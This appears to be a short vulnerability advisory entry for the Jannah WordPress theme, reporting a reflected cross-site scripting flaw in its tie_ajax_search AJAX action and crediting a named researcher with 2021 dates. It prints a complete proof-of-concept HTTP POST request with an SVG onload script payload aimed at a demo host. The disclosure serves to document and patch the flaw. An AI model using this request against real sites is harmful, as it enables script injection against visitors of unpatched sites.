The theme did not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action, leading to a Reflected Cross-site Scripting (XSS) vulnerability.
POST /demo/wp-admin/admin-ajax.php HTTP/1.1 Host: jannah.tielabs.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 66 Connection: close action=tie_ajax_search&query[]=<svg+onload=alert(document.domain)>
Truoc Phan from Techlab Corporation
Truoc Phan
Yes
2021-06-14 (about 1 years ago)
2021-06-14 (about 1 years ago)
2021-06-25 (about 1 years ago)